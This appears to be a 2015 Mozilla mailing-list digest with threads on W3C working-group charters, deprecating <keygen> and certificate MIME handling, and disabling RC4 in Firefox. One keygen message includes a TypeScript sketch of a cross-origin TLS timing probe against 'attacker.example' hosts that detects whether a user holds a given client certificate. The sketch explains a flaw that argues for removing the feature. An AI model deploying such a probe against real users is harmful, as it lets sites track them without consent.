Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread Anne van Kesteren
It seems the two hours are up, but I wanted to ask a question anyway.

On Fri, Sep 11, 2015 at 3:53 AM, L. David Baron  wrote:
> I'm still considering between two different endings:
>
> ...

Note that they are already actively ignoring the WHATWG.


> =
>
> One of the major problems in reaching interoperability for media
> standards has been patent licensing of lower-level standards covering
> many lower-level media technologies. ...

Was this included? I ask since you mentioned the endings before you got to this.
This is also a problem of sorts with other work the W3C is doing,
where they charter work on high-level APIs without having sorted out,
or planning to sort out, the protocol, e.g., the Presentation API.


-- 
https://annevankesteren.nl/


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread Jonas Sicking
On Thu, Sep 10, 2015 at 5:27 PM, Tantek Çelik  wrote:
>> On 09/10/2015 06:36 PM, Jonas Sicking wrote:
>> > If I am the only one that wants to put in a formal objection here,
>> > then I'll let it go and go with whatever everyone else thinks we
>> > should do.
>> >
>>
>> FWIW, I agree with Jonas that this is a terrible idea. (Even if we're
>> the only Member raising a formal objection,
>>
>
> I understand why it's not great; however, could you follow up with specific
> reasons why it's "terrible"?

The HTML WG has historically contained so much noise that nearly all
productive contributors have left the group, leaving it unable to make
almost any useful contributions to HTML5. This has been such a big
problem that the WG's future existence has been called into question.

The WebApps WG is working very well and produces a large number of
highly successful and widely adopted specifications that have been very
good for the web.

The proposal here is to merge these two groups. I see no reason to
believe that the noise that exists in the HTML WG would not have the
same effect in this new WG.

I.e. the WebApps WG might become as unproductive as the HTML WG has been.

That would be terrible for the web.

/ Jonas


Re: On the future of <keygen> and application/x-x509-*-cert MIME handling

2015-09-11 Thread Martin Thomson
Awesome, thanks Ryan.

This cements my opinion on their fate.  These are not just old and
crufty, they are actively harmful.  They can't be removed soon enough.

I'm not fundamentally opposed to the notion of having some sort of
site control of client authentication in general, and maybe even TLS
client authentication specifically, but this feature[7] cannot
continue to exist as part of the web platform.

[7] By which I mean the certificate download and install part, keygen
seems to be more on the cruft side based on what I've seen.

On Fri, Sep 11, 2015 at 9:42 PM, Ryan Sleevi  wrote:
> [No idea if these will show up on the lists since I'm not subscribed]
>
> On Fri, Sep 11, 2015 at 9:30 PM, Martin Thomson  wrote:
>
>> I have some questions, to which I was unable to find answers for in
>> the (numerous and long) threads on this subject.
>>
>> 1. When we download and install a client cert, what checking do we do?
>>  Do we insist upon it meeting the same algorithm requirements we have
>> for servers with respect to use of things like short RSA keys and weak
>> hashes (MD5/SHA-1)?
>>
>
> No. These are client certs (generally for internal systems), for which
> there are no imposed policies (CA/B Forum or otherwise).
>
> The only checking re: algorithms are those which NSS itself has not
> disabled globally (MD5, minimum keysizes, etc), but only if they present as
> parse errors - not as signature validation errors.
>
> If it comes in as application/x-x509-user-cert (vs, say,
> application/x-x509-ca-cert, which can be used to quickly add a root
> certificate),
> http://mxr.mozilla.org/mozilla-central/source/security/manager/ssl/nsNSSCertificateDB.cpp#849
> is what first parses/interprets the byte stream.
>
> The validation requires:
> 1) That the user has an existing private key (from any source, <keygen> or
> otherwise - so you can use this as an existence proof of whether or not a
> user has a matching key). That's line 886
> 2) That it's syntactically valid for one of the forms Mozilla accepts - or
> one of the ones it can munge into something it accepts (a liberal decoder)
> - that's line 875
>
> If so, it'll toast the user (via
> http://mxr.mozilla.org/mozilla-central/source/security/manager/ssl/nsNSSCertificateDB.cpp#810
> ) to let them know a certificate was installed (after the fact)
>
> It'll then parse the rest of the bundle, and if they are certificates that
> chain to a CA the user trusts, they'll also be imported (that's line 924)
>
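
(Just to check my reading of the above, the flow is roughly the following.
This is an illustrative TypeScript-style sketch with made-up names, not the
actual nsNSSCertificateDB code; the line numbers in the comments refer to
Ryan's references above.)

  // Hypothetical stand-ins for the real parsing/DB/notification machinery.
  interface Cert {
    issuer: string;
    chainsToTrustedCA: boolean;
  }

  function importUserCertBundle(
    bundle: Cert[],                               // already parsed, possibly "munged" (line 875)
    hasMatchingPrivateKey: (c: Cert) => boolean,  // existence check against the key store (line 886)
    importIntoDb: (c: Cert) => void,
    notifyUser: (c: Cert) => void,                // after-the-fact toast (line 810)
  ): boolean {
    const userCert: Cert | undefined = bundle[0];
    if (userCert === undefined) return false;     // nothing decodable
    if (!hasMatchingPrivateKey(userCert)) return false;
    importIntoDb(userCert);
    notifyUser(userCert);
    for (const extra of bundle.slice(1)) {
      // The rest of the bundle is imported only if it chains to a CA the
      // user already trusts (line 924).
      if (extra.chainsToTrustedCA) importIntoDb(extra);
    }
    return true;
  }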
>
> This behaviour, however, is different than Chrome's in several ways
> (primarily related to the parsing of the bundle and handling the additional
> certificates). Chrome also explored a number of strict checks (is it a
> valid client certificate from a known CA), but those had to be relaxed for
> compatibility with Firefox and the existing use cases.
>
> We also explored not committing the generated key to the persistent
> keystore until it'd been "confirmed" (via installation of a certificate),
> except that broke nearly every <keygen> use case outside of WebID. In
> particular, if you closed Chrome, we'd destroy the key - so that didn't
> work for situations where you'd do a <keygen> enrollment, close Chrome, and a
> day later get an email with a link from your CA w/ the certificate. So
> you'd need some form of semi-persistent, origin-scoped storage if you went
> that way.
>
>
>>
>> 2. What is the potential scope of use for a client certificate?
>> Global?  The origin that provided it?  Something in-between like
>> domain or domain plus subdomains?
>>
>
> Global - all domains, all applications. A common pattern, as seen on the
> CA/Browser Forum list, is to use this method to configure S/MIME
> certificates for Thunderbird, which uses the same NSS database.
>
> Any other domain could do an existence test to see if a user has such a
> certificate, by using <keygen> to create a key (which may or may not
> involve prompting; various criteria there), using
> application/x-x509-user-cert to deliver the user's cert that matches a
> chosen ("attacker") issuer string, and then doing a TLS handshake that
> requests a client certificate with the ca_names set to the attacker's
> unique fingerprint.
>
> The timing difference between the handshakes - whether or not the user has
> a matching certificate and private key - can reveal to any domain who knows
> the ca_names whether or not the user matches, at the cost of potentially
> prompting the user (if they do match).
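
(So, given a certificate delivered for the attacker's own issuer as described
above, the probe from the attacking page is essentially just two timed
handshakes. A rough TypeScript sketch; the host names, paths, and the 200 ms
threshold are all made up for illustration, and the "auth" host is assumed to
send a CertificateRequest listing the attacker's issuer in ca_names:)

  // Time a cross-origin fetch; even an opaque or failed response still
  // reflects how long the TLS handshake took. Separate host names are used
  // so the two requests cannot share a connection.
  async function timeHandshake(url: string): Promise<number> {
    const start = performance.now();
    try {
      await fetch(url, { mode: "no-cors", cache: "no-store" });
    } catch {
      // Ignore network errors; only the elapsed time matters.
    }
    return performance.now() - start;
  }

  async function userHasMatchingClientCert(): Promise<boolean> {
    const baseline = await timeHandshake("https://plain.attacker.example/");
    const probe = await timeHandshake("https://auth.attacker.example/");
    // If the user has a certificate and key matching the attacker's
    // ca_names, client-certificate selection (and possibly a prompt) slows
    // the second handshake measurably.
    return probe - baseline > 200;
  }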


Re: On the future of <keygen> and application/x-x509-*-cert MIME handling

2015-09-11 Thread Martin Thomson
I have some questions, to which I was unable to find answers for in
the (numerous and long) threads on this subject.

1. When we download and install a client cert, what checking do we do?
 Do we insist upon it meeting the same algorithm requirements we have
for servers with respect to use of things like short RSA keys and weak
hashes (MD5/SHA-1)?

2. What is the potential scope of use for a client certificate?
Global?  The origin that provided it?  Something in-between like
domain or domain plus subdomains?

I'll go and dig around in the code if I have to, but if someone has
the answers readily available, or wants to do the rummaging for me,
that would be much appreciated.

On Wed, Jul 29, 2015 at 4:35 PM, David Keeler  wrote:
> [cc'd to dev-security for visibility. This discussion is intended to
> happen on dev-platform; please reply to that list.]
>
> Ryan Sleevi recently announced the pre-intention to deprecate and
> eventually remove support for the <keygen> element and special-case
> handling of the application/x-x509-*-cert MIME types from the blink
> platform (i.e. Chrome).
>
> Rather than reiterate his detailed analysis, I'll refer to the post here:
>
> https://groups.google.com/a/chromium.org/d/msg/blink-dev/pX5NbX0Xack/kmHsyMGJZAMJ
>
> Much, if not all, of that reasoning applies to gecko as well.
> Furthermore, it would be a considerable architectural improvement if
> gecko were to remove these features (particularly with respect to e10s).
> Additionally, if they were removed from blink, the compatibility impact
> of removing them from gecko would be lessened.
>
> I therefore propose we follow suit and begin the process of deprecating
> and removing these features. The intention of this post is to begin a
> discussion to determine the feasibility of doing so.
>
> Cheers,
> David
>
>


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread smaug

On 09/11/2015 04:53 AM, L. David Baron wrote:

On Tuesday 2015-09-08 17:33 -0700, Tantek Çelik wrote:

Follow-up on this, since we now have two days remaining to respond to these
proposed charters.

If you still have strong opinions about the proposed Web Platform and Timed
Media Working Groups charters, please reply within 24 hours so we have the
opportunity to integrate your opinions into Mozilla's response to these
charters.


Here are the comments I have so far (Web Platform charter first,
then timed media).

The deadline for comments is in about 2 hours.  I'll submit these
tentatively, but can revise if I get feedback quickly.  (Sorry for
not gathering them sooner.)

-David

=

We are very concerned that the merger of HTML work into the functional
WebApps group might harm the ability of the work happening in WebApps to
continue to make progress as well as it currently does.  While a number
of people within Mozilla think we should formally object to this merger
because of the risk to work within WebApps, I am not making this a
formal objection.  However, I think the proper functioning of this group
needs to be carefully monitored, and the consortium needs to be prepared
to make changes quickly if problems occur.  And I think it would be
helpful if the HTML and WebApps mailing lists are *not* merged.



This sounds good to me.
After chatting with MikeSmith and ArtB I'm not so worried about the merge
anymore.
(Apparently "merge" is even a bit too strong a word here; it is more like
taking the specification to the WebApps WG, while trying not to take the
rest of the baggage from the HTML WG.)


-Olli




A charter that includes many documents that are primarily developed
at the WHATWG should explicitly mention the WHATWG.  It should explain
how the relationship works, including satisfactorily explaining how
W3C's work on specifications that are rapidly evolving at the WHATWG
will not harm interoperability (presuming that the W3C work isn't just
completely ignored).

In particular, this concerns the following items of chartered work:
   * Quota Management API
   * Web Storage (2nd Edition)
   * DOM4
   * HTML
   * HTML Canvas 2D Context
   * Web Sockets API
   * XHR Level 1
   * Fetching resources
   * Streams API
   * URL
   * Web Workers
and the following items in the specification maintenance section:
   * CORS
   * DOM specifications
   * HTML 5.0
   * Progress Events
   * Server-sent Events
   * Web Storage
   * Web Messaging

One possible approach to this problem would be to duplicate the
technical work happening elsewhere on fewer or none of these
specifications.  However, given that I don't expect that to happen, the
charter still needs to explain the relationship between the technical
work happening at the WHATWG and the technical work (if any) happening
at the W3C.


The group should not be chartered to modularize the entire HTML
specification.  While specific documents that have value in being
separated, that have active editorship, and that have implementation
interest are worth separating, chartering a group to do full
modularization of the HTML specification feels both like busywork and
like chartering work that is
too speculative and not properly incubated.  It also seems like it will
be harmful to interoperability since it proposes to modularize a
specification whose primary source is maintained elsewhere, at the
WHATWG.


The charter should not include work on HTML Imports.  We don't plan to
implement it for the reasons described in
https://hacks.mozilla.org/2014/12/mozilla-and-web-components/
and believe that it will no longer be needed when JavaScript modules are
available.


The inclusion of "Robust Anchoring API" in the charter is suspicious
given that we haven't heard of it before.  It should probably be in an
incubation process before being a chartered work item.


We also don't think the working group should be chartered to work
on any items related to "Widgets"; this technology is no longer used.



I'm still considering between two different endings:

OPTION 1:

Note that while this response is not a formal objection, many of these
issues are serious concerns and we hope they will be properly
considered.

OPTION 2:

The only part of this response that constitutes a formal objection is
the request for a reasonable explanation of the relationship between the
working group and the work happening at the WHATWG (rather than ignoring
the existence of the WHATWG).  However, many of the other issues
raised are serious concerns and we hope they will be properly
considered.

=

One of the major problems in reaching interoperability for media
standards has been patent licensing of lower-level standards covering
many lower-level media technologies.  The W3C's Patent Policy only helps
with technology that the W3C develops, and not technology that it
references.  Given that, this group's charter should explicitly prefer
referencing technology that can be implemented and used without paying
royalties and 

Re: Intent to ship: RC4 disabled by default in Firefox 44

2015-09-11 Thread Richard Barnes
Hearing no objections, let's consider this the plan of record.

Thanks,
--Richard

On Tue, Sep 1, 2015 at 12:56 PM, Richard Barnes  wrote:

> For a while now, we have been progressively disabling the known-insecure
> RC4 cipher [0].  The security team has been discussing with the other
> browser vendors when to turn off RC4 entirely, and there seems to be
> agreement to take that action in late January / early February 2016,
> following the release schedules of the various browsers.  For Firefox, that
> means version 44, currently scheduled for release on Jan 26.
>
> More details below.
>
>
> # Current status
>
> Since Firefox 37, RC4 has been partly disabled in Firefox.  It still works
> in Beta and Release, but in Nightly and Aurora, it is allowed only for a
> static whitelist of hosts [1][2].  Note that the whitelist is not
> systematic; it was mainly built from compatibility bugs.
>
> RC4 support is controlled by three preferences:
>
> * security.tls.unrestricted_rc4_fallback - Allows use of RC4 with no
> restrictions
> * security.tls.insecure_fallback_hosts.use_static_list - Allow RC4 for
> hosts on the static whitelist
> * security.tls.insecure_fallback_hosts - A list of hosts for which RC4 is
> allowed (empty by default)
>
>
> # Proposal
>
> The proposed plan is to gradually reduce RC4 support by making the default
> values of these preferences more restrictive:
>
> * 42/ASAP: Disable whitelist in Nightly/Aurora; no change in Beta/Release
> * 43: Disable unrestricted fallback in Beta/Release (thus allowing RC4
> only for whitelisted hosts)
> * 44: Disable all RC4 prefs by default, in all releases
>
> That is, as of Firefox 44, RC4 will be entirely disabled unless a user
> explicitly enables it through one of the prefs.
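
(In user.js terms the proposed 44 defaults amount to roughly the following.
The pref names are the ones listed above; the value types and the example
hostname are my reading of the proposal rather than anything authoritative.)

  // Declaration only so the snippet also type-checks as TypeScript; in an
  // actual user.js only the user_pref() lines are needed.
  declare function user_pref(name: string, value: boolean | string): void;

  user_pref("security.tls.unrestricted_rc4_fallback", false);                // no unrestricted RC4 fallback
  user_pref("security.tls.insecure_fallback_hosts.use_static_list", false);  // ignore the static whitelist
  user_pref("security.tls.insecure_fallback_hosts", "");                     // no per-host exceptions

  // A user who still needs one legacy server could instead whitelist it:
  // user_pref("security.tls.insecure_fallback_hosts", "legacy.example.com");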
>
>
> # Compatibility impact
>
> Disabling RC4 will mean that Firefox will no longer connect to servers
> that require RC4.  The data we have indicate that while there are still a
> small number of such servers, Firefox users encounter them at very low
> rates.
>
> Telemetry indicates that in the Beta and Release populations, which have
> no restrictions on RC4 usage, RC4 is used for around 0.08% for Release and
> around 0.05%  for Beta [3][4].  For Nightly and Aurora, which are
> restricted to the whitelist, the figure is more like 0.025% [5].  These
> numbers are small enough that the histogram viewer on
> telemetry.mozilla.org won't show them (that's why the below references
> are to my own telemetry timeline tool, rather than telemetry.mozilla.org).
>
> That said, there is a small but measurable population of servers out there
> that require RC4.  Scans by Mozilla QA team find that with current Aurora
> (whitelist enabled), around 0.41% of their test set require RC4, 820 sites
> out of 211k.  Disabling the whitelist only results in a further 26 sites
> broken, totaling 0.4% of sites.  I have heard some rumors about there being
> a higher prevalence of RC4 among enterprise sites, but have no data to
> support this.
>
> Users can still enable RC4 in any case by changing the above prefs, either
> by turning on RC4 in general or by  adding specific hosts to the
> "insecure_fallback_hosts" whitelist.  The security and UX teams are
> discussing possibilities for UI that would automate whitelisting of sites
> for users.
>
> [0] https://tools.ietf.org/html/rfc7465
> [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1128227
> [2]
> https://dxr.mozilla.org/mozilla-central/source/security/manager/ssl/IntolerantFallbackList.inc
> [3]
> https://ipv.sx/telemetry/general-v2.html?channels=release=SSL_SYMMETRIC_CIPHER_FULL=1
> [4]
> https://ipv.sx/telemetry/general-v2.html?channels=beta=SSL_SYMMETRIC_CIPHER_FULL=1
> [5]
> https://ipv.sx/telemetry/general-v2.html?channels=nightly%20aurora=SSL_SYMMETRIC_CIPHER_FULL=1
>


Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread L. David Baron
On Friday 2015-09-11 09:43 +0200, Anne van Kesteren wrote:
> It seems the two hours are up, but I wanted to ask a question anyway.
> 
> On Fri, Sep 11, 2015 at 3:53 AM, L. David Baron  wrote:
> > I'm still considering between two different endings:
> >
> > ...
> 
> Note that they are already actively ignoring the WHATWG.

I used:

  # The only part of this response that constitutes a formal objection is
  # the request for a reasonable explanation of the relationship between the
  # working group and the work happening at the WHATWG (rather than nearly
  # ignoring the existence of the WHATWG).  However, many of the other issues
  # raised are serious concerns and we hope they will be properly
  # considered.

> > =
> >
> > One of the major problems in reaching interoperability for media
> > standards has been patent licensing of lower-level standards covering
> > many lower-level media technologies. ...
> 
> Was this included? I ask since you mentioned the endings before you got to this.
> This is also a problem of sorts with other work the W3C is doing,
> where they charter work on high-level APIs without having sorted out,
> or planning to sort out, the protocol, e.g., the Presentation API.

Yes.  Those were the comments on the timed media charter, though.

-David

-- 
L. David Baron                           http://dbaron.org/
Mozilla                            https://www.mozilla.org/
 Before I built a wall I'd ask to know
 What I was walling in or walling out,
 And to whom I was like to give offense.
   - Robert Frost, Mending Wall (1914)




Re: Proposed W3C Charters: Web Platform and Timed Media Working Groups

2015-09-11 Thread L. David Baron
On Friday 2015-09-11 00:46 -0700, Jonas Sicking wrote:
> The HTML WG has historically contained so much noise that nearly all
> productive contributors have left the group, leaving it unable to make
> almost any useful contributions to HTML5. This has been such a big
> problem that the WG's future existence has been called into question.
> 
> The WebApps WG is working very well and produces a large number of
> highly successful and widely adopted specifications that have been very
> good for the web.
> 
> The proposal here is to merge these two groups. I see no reason to
> believe that the noise that exists in the HTML WG would not have the
> same effect in this new WG.
> 
> I.e. the WebApps WG might become as unproductive as the HTML WG has been.
> 
> That would be terrible for the web.

I think the risk here is lower than you think because neither the
process, nor the chairs, nor the bulk of the members (the public
invited experts) of the HTML WG are being merged.  And I think
others are aware of the risks, and willing to stop bad actors.

-David

-- 
L. David Baron                           http://dbaron.org/
Mozilla                            https://www.mozilla.org/
 Before I built a wall I'd ask to know
 What I was walling in or walling out,
 And to whom I was like to give offense.
   - Robert Frost, Mending Wall (1914)

